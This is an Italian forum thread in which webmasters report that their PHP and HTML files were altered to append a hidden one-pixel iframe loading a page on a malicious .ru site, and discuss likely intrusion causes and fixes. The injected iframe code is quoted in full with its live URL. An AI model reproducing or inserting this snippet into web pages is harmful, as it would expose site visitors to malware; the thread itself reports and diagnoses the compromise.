file php modificati sul server

[punkamorfo]

ciao, ho un problema alquanto strano.
Un mio cliente mi ha kiamato dicendomi ke nn funzionavano piu le gallery sul suo sito, che finora avevano sempre funzionato.
Controlloando tutto ho individuato il problema.

Su tutti i file php presenti sul server ho trovato una modifica..se cosi si puo chiamare.

In pratica su ogni file, dopo la chiusura del tag

Codice PHP:

?> 


ho trovato questo:

Codice PHP:

html><body><iframe width=1 height=1 border=0 frameborder=0 src="http://planetm6power.ru/cfi/index.php"></iframe></body></html>> 


con la conseguenza che salta tutto lo script.

Cosa può essere? Qualke hacker? o cos altro.
Ora tocca che controlliamo tutti i siti in cui è presente qualke script php..

Buone vacanze

[ade_v]

Ho provato a guardare il sito riportato nel'iframe e firefox (l'ultima versione) me l'ha bloccato come 'sito malevolo'. La pista dell'hacker mi sembra la più attendibile

[daniele_dll]

è abbastanza chiaro quello che è successo: un cracker (l'hacker è una persona che studia non che fa danni) ha avuto accesso a quelle pagine modificandole

ora se:
- stai su server windows questo potrebbe voler dire che è riuscito ad eseguire del suo codice php ed ha avuto accesso ai file delle pagine php modificandole
- stai su server linux questo potrebbe voler dire che hanno bucato la macchina, tranne che si utilizzi qualche particolare soluzione

però li entrano in ballo pannelli di controllo, struttura del servizio di hosting e cosi via

tutto ciò però va in secondo piano se tu utilizzi una gallery pre-confezionata ovvero che non hai scritto tu perché in questo caso basta google ed un bot per fare il patacrack (se sei su server windows)

controlla che tu abbia le ultime versioni aggiornate dopo di che chiama il tuo hoster e spiega cos'è successo e, fagli notare (se stai su hosting linux), che apache (quindi php) non ha accesso in scrittura alle pagine .php perché stanno sotto un altro utente con permessi che bloccano la scrittura a tutti (quel fatidico 666/777) ... in realtà ci sarebberò da fare dei controlli prima di poter affermare con certezza una cosa del genere però se stai su linux è possibile/probabile che sia cosi ^^

[punkamorfo]

il server è windows ed è di proprietà dell'azienda con la quale collaboro. Alla fine non è che ci siano chisà quali dati, i file php in questione sono dei semplici file per il crossdomain e altri per elencare il contenuto di una cartella.

Cmq sia riferirò, poi v farò sapere.

[siste82]

Salve ache a me è successa la stessa identica cosa, il server che utilizzo è un server windows, e vi faccio notare che oltre alle pagine php sono riusciti a modificare anche le pagine html (inserendo sempre la stessa stringa).
Sapete come fare in modo che ciò non riaccada?
Grazie, saluti.